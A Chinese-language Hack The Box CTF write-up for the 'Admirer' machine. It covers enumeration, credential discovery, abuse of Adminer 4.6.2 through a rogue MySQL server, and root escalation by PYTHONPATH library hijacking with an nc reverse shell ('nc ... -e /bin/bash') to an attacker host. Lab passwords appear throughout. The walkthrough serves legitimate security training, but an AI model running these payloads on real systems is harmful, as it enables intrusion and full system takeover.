HTB-[admirer]

0x00.简述

0x01.信息收集

开放了21/22/80端口，robots.txt中一个不允许爬虫目录admin-dir

root@JIYE:~/htb/admirer# nmap -sC -sV -sT 10.10.10.187 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 01:33 EDT
Nmap scan report for 10.10.10.187
Host is up (0.37s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.20 seconds
root@JIYE:~/htb/admirer#

0x02.访问80端口

手动爬虫没有发现什么有用的

查看robots.txt，与nmap扫描出的结果一样

查看admin-dir目录，结果是没有权限

0x03.FUZZ测试

创建字典本次字典

1 2	root@JIYE:~/htb/admirer# ls big.txt nmap.CVT

扫描，发现两个文件

root@JIYE:~/htb/admirer# wfuzz -c -w big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 50

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ.FUZ2Z
Total requests: 61419

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                     
===================================================================

000015592:   200        29 L     39 W     350 Ch      "contacts - txt"                                                                            
000016327:   200        11 L     13 W     136 Ch      "credentials - txt"                                                                         

Total time: 530.5189
Processed Requests: 61419
Filtered Requests: 61417
Requests/sec.: 115.7715

root@JIYE:~/htb/admirer#

依次访问，发现了FTP的用户名与密码

0x04.TFP登入

发现一个sql文件与网站根目录文件

root@JIYE:~/htb/admirer# cat ftp.dic 
ftpuser   %n?4Wz}R$tTF7
root@JIYE:~/htb/admirer# ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp>

下载

ftp> get dump.sql
local: dump.sql remote: dump.sql
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.07 secs (46.7245 kB/s)
ftp> get html.tar.gz
local: html.tar.gz remote: html.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 10.78 secs (477.4579 kB/s)
ftp> exit
221 Goodbye.
root@JIYE:~/htb/admirer# ls
big.txt  dump.sql  ftp.dic  html.tar.gz  nmap.CVT
root@JIYE:~/htb/admirer#

解压进行查看，发现根目录下存在utility-scripts目录，并且也发现了数据库的一个用户名与密码

root@JIYE:~/htb/admirer/html# ls
assets  images  index.php  robots.txt  utility-scripts  w4ld0s_s3cr3t_d1r
root@JIYE:~/htb/admirer/html# cd utility-scripts/
root@JIYE:~/htb/admirer/html/utility-scripts# ls
admin_tasks.php  db_admin.php  info.php  phptest.php
root@JIYE:~/htb/admirer/html/utility-scripts# cat db_admin.php 
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

  // Create connection
  $conn = new mysqli($servername, $username, $password);

  // Check connection
  if ($conn->connect_error) {
      die("Connection failed: " . $conn->connect_error);
  }
  echo "Connected successfully";


  // TODO: Finish implementing this or find a better open source alternative
?>
root@JIYE:~/htb/admirer/html/utility-scripts#

也发现了网站用户名与密码，尝试ssh登入但是失败了，应该是过期了。

root@JIYE:~/htb/admirer/html# cat index.php  | grep username
                        $username = "waldo";
                        $conn = new mysqli($servername, $username, $password, $dbname);
root@JIYE:~/htb/admirer/html# cat index.php  | grep password
                        $password = "]F7jLHw:*G>UPrTo}~A"d6b";
                        $conn = new mysqli($servername, $username, $password, $dbname);

0x05.访问utility-scripts

依然没有权限，发现三个目录

再次进行FUZZ测试

root@JIYE:~/htb/admirer# wfuzz -c -w big.txt -z list,txt-php-html -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z --hc 404,403 -t 50

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Total requests: 61419

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                     
===================================================================

000005618:   200        51 L     235 W    4157 Ch     "adminer - php"                                                                             
000028853:   200        964 L    4976 W   84030 Ch    "info - php"                                                                                
000041603:   200        0 L      8 W      32 Ch       "phptest - php"                                                                             

Total time: 496.4518
Processed Requests: 61419
Filtered Requests: 61416
Requests/sec.: 123.7159

root@JIYE:~/htb/admirer#

依次访问，发现adminer.php为数据库管理系统（v4.62）登入页面

0x06.adminer(v4.62)漏洞利用参考

参考中说，该漏洞可以“反向”连接到托管在自己服务器上的MySQL数据库。

exploit

1.首先启动mysql

1	root@JIYE:~/htb/admirer# systemctl start mysql

2.创建一个数据库用于连接

MariaDB [(none)]> create database admirer;
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]>

3.创建一个用户

此用户密码为demo，可以在任意主机登入

MariaDB [(none)]> create user 'demo'@'%' identified by 'demo';
Query OK, 0 rows affected (0.003 sec)

MariaDB [(none)]>

4.赋予root权限给demo

MariaDB [(none)]> grant all privileges on * . * to 'demo'@'%';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]>

5.创建一个表

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| admirer            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [(none)]> use admirer;
Database changed
MariaDB [admirer]> create table test (data varchar(225));
Query OK, 0 rows affected (0.007 sec)

MariaDB [admirer]> show tables;
+-------------------+
| Tables_in_admirer |
+-------------------+
| test              |
+-------------------+
1 row in set (0.000 sec)

MariaDB [admirer]>

6.修改MySQL配置文件，允许任意地址访问

root@JIYE:/etc/mysql/mariadb.conf.d# vim 50-server.cnf
···
bind-address            = 0.0.0.0
···
root@JIYE:/etc/mysql/mariadb.conf.d# systemctl restart mysql

7.demo登入测试

root@JIYE:~# mysql -h localhost -udemo -pdemo
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 38
Server version: 10.3.23-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

0x07.admirer登入

1.导入/etc/passwd到test

不能导入

2.导入/var/www/html/index.php到test

导入成功

3.导出test表

导出文件内容如下

-- Adminer 4.6.2 MySQL dump

SET NAMES utf8;
SET time_zone = '+00:00';
SET foreign_key_checks = 0;
SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';

SET NAMES utf8mb4;

DROP TABLE IF EXISTS `test`;
CREATE TABLE `test` (
  `data` varchar(225) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

INSERT INTO `test` (`data`) VALUES
('<!DOCTYPE HTML>'),
('<!--'),
('    Multiverse by HTML5 UP'),
('    html5up.net | @ajlkn'),
('    Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)'),
('-->'),
('<html>'),
('    <head>'),
('        <title>Admirer</title>'),
('        <meta charset=\"utf-8\" />'),
('        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, user-scalable=no\" />'),
('        <link rel=\"stylesheet\" href=\"assets/css/main.css\" />'),
('        <noscript><link rel=\"stylesheet\" href=\"assets/css'),
('    </head>'),
('    <body class=\"is-preload\">'),
(''),
('        <!-- Wrapper -->'),
('            <div id=\"wrapper\">'),
(''),
('                <!-- Header -->'),
('                    <header id=\"header\">'),
('                        <h1><a href=\"index.html\"><strong>Admirer</strong> of skills and visuals</a></h1>'),
('                        <nav>'),
('                            <ul>'),
('                                <li><a href=\"#footer\" class=\"icon solid fa-info-circle\">About</a></li>'),
('                            </ul>'),
('                        <'),
('                    </header>'),
(''),
('                <!-- Main -->'),
('                    <div id=\"main\">            '),
('                     <?php'),
('                        $servername = \"localhost\";'),
('                        $username = \"waldo\";'),
('                        $password = \"&<h5b~yK3F#{PaPB&dA}{H>\";'),
('                        $dbname = \"admirerdb\";'),
(''),
('                        // Create connection'),
('                        $conn = new mysqli($servername, $username, $password, $dbname);'),
('                        // Check connection'),
('                        if ($conn->connect_error) {'),
('                            die(\"Connection failed: \" . $conn->connect_error);'),
('                        }'),
(''),
('                        $sql = \"SELECT * FROM items\";'),
('                        $result = $conn->query($sql);'),
(''),
('                        if ($result->num_rows > 0) {'),
('                            // output data of each row'),
('                            while($row = $result->fetch_assoc()) {'),
('                                echo \"<article class=\'thumb\'>\n\";'),
('                                echo \"<a href=\'\".$row[\"image_path\"].\"\' class=\'image\'><img src=\'\".$row[\"thumb_path\"].\"\' alt=\'\' /></a>\n\";'),
('                                echo \"<h2>\".$row[\"title\"].\"</h2>\n\";'),
('                                echo \"<p>\".$row[\"text\"].\"</p>\n\";'),
('                                echo \"</article>\n\";'),
('                            }'),
('                        } else {'),
('                            echo \"0 results\";'),
('                        }'),
('                        $conn->close();'),
('                    ?>'),
('                    </div>'),
(''),
('                <!-- Footer -->'),
('                    <footer id=\"footer\" class=\"panel\">'),
('                        <div class=\"inner split\">'),
('                            <div>'),
('                                <section>'),
('                                    <h2>Allow yourself to be amazed</h2>'),
('                                    <p>Skills are not to be envied, but to feel inspired by.<br>'),
('                                    Visual arts and music are there to take care of your soul.<br><br>'),
('                                    Let your senses soak up these wonders...<br><br><br><br>'),
('                                    </p>'),
('                                </section>'),
('                                <section>'),
('                                    <h2>Follow me on ...</h2>'),
('                                    <ul class=\"icons\">'),
('                                        <li><a href=\"#\" class=\"icon brands fa-twitter\"><span class=\"label\">Twitter</span></a></li>'),
('                                        <li><a href=\"#\" class=\"icon brands fa-facebook-f\"><span class=\"label\">Facebook</span></a></li>'),
('                                        <li><a href=\"#\" class=\"icon brands fa-instagram\"><span class=\"label\">Instagram</span></a></li>'),
('                                        <li><a href=\"#\" class=\"icon brands fa-github\"><span class=\"label\">GitHub</span></a></li>'),
('                                        <li><a href=\"#\" class=\"icon brands fa-dribbble\"><span class=\"label\">Dribbble</span></a></li>'),
('                                        <li><a href=\"#\" class=\"icon brands fa-linkedin-in\"><span class=\"label\">LinkedIn</span></a></li>'),
('                                    </ul>'),
('                                </section>'),
('                            </div>'),
('                            <div>'),
('                                <section>'),
('                                    <h2>Get in touch</h2>'),
('                                    <form method=\"post\" action=\"#\"><!-- Still under development... This does not send anything yet, but it looks nice! -->'),
('                                        <div class=\"fields\">'),
('                                            <div class=\"field half\">'),
('                                                <input type=\"text\" name=\"name\" id=\"name\" placeholder=\"Name\" />'),
('                                            </div>'),
('                                            <div class=\"field half\">'),
('                                                <input type=\"text\" name=\"email\" id=\"email\" placeholder=\"Email\" />'),
('                                            </div>'),
('                                            <div class=\"field\">'),
('                                                <textarea name=\"message\" id=\"message\" rows=\"4\" placeholder=\"Message\"></textarea>'),
('                                            </div>'),
('                                        </div>'),
('                                        <ul class=\"actions\">'),
('                                            <li><input type=\"submit\" value=\"Send\" class=\"primary\" /></li>'),
('                                            <li><input type=\"reset\" value=\"Reset\" /></li>'),
('                                        </ul>'),
('                                    </form>'),
('                                </section>'),
('                            </div>'),
('                        </div>'),
('                    </footer>'),
(''),
('            </div>'),
(''),
('        <!-- Scripts -->'),
('            <script src=\"assets/js/jquery.min.js\"></script>'),
('            <script src=\"assets/js/jquery.poptrox.min.js\"></script>'),
('            <script src=\"assets/js/browser.min.js\"></script>'),
('            <script src=\"assets/js/breakpoints.min.js\"></script>'),
('            <script src=\"assets/js/util.js\"></script>'),
('            <script src=\"assets/js/main.js\"></script>'),
(''),
('    </body>'),
('</html>');

-- 2020-09-05 08:07:51

找到用户名与密码

$servername = \"localhost\";
$username = \"waldo\";'),
$password = \"&<h5b~yK3F#{PaPB&dA}{H>\";
$dbname = \"admirerdb\";

0x08.ssh登入

root@JIYE:~/htb/admirer# cat user 
waldo   &<h5b~yK3F#{PaPB&dA}{H>
root@JIYE:~/htb/admirer# ssh waldo@10.10.10.187
waldo@10.10.10.187's password: 
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sat Sep  5 09:06:54 2020 from 10.10.14.80
waldo@admirer:~$

找到flag

waldo@admirer:~$ ls
test  user.txt
waldo@admirer:~$ cat user.txt 
*******************************
waldo@admirer:~$

0x09.提权

/opt/scripts/admin_tasks.sh可以用来提权

waldo@admirer:~$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:~$

查看此脚本，发现此脚本用来备份数据

waldo@admirer:/opt/scripts$ ls
admin_tasks.sh  backup.py
waldo@admirer:/opt/scripts$ cat admin_tasks.sh 
#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo "Unknown option." >&2
    esac

    exit 0
fi


# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;

        *) echo "Unknown option." >&2
    esac
done

exit 0
waldo@admirer:/opt/scripts$

查看backup.py，发现此脚本用来将/var/www/html/备份到ftp目录下的/var/backups/html，并压缩。
两个脚本一起分析为，运行admin_tasks.sh将调用backup.py备份数据。

waldo@admirer:/opt/scripts$ cat backup.py 
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)
waldo@admirer:/opt/scripts$

尝试修改backup.sh，但是没有权限。
重新创建backup.sh，并修改python调用路径。

waldo@admirer:~$ mkdir fjy
waldo@admirer:~$ cd fjy
waldo@admirer:~/fjy$ cat shutil.py 
import os
def make_archive(x,y,z):
    os.system("nc 10.10.17.216 6666 -e '/bin/bash'")
waldo@admirer:~/fjy$

kali监听

1
2
3

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...

执行

waldo@admirer:~/fjy$ sudo PYTHONPATH=~/fjy /opt/scripts/admin_tasks.sh 
[sudo] password for waldo: 

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option:

选择6

1
2
3

Choose an option: 6
Running backup script in the background, it might take a while...
waldo@admirer:~/fjy$

kali得到shell

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.187] 38682
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")' 
root@admirer:/home/waldo/fjy# whoami
whoami
root
root@admirer:/home/waldo/fjy# ^Z
[1]+  已停止               nc -nvlp 6666
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 6666

root@admirer:/home/waldo/fjy# ls
shutil.py
root@admirer:/home/waldo/fjy# cd
root@admirer:~# ls
root.txt
root@admirer:~# cat root.txt 
*******************************
root@admirer:~#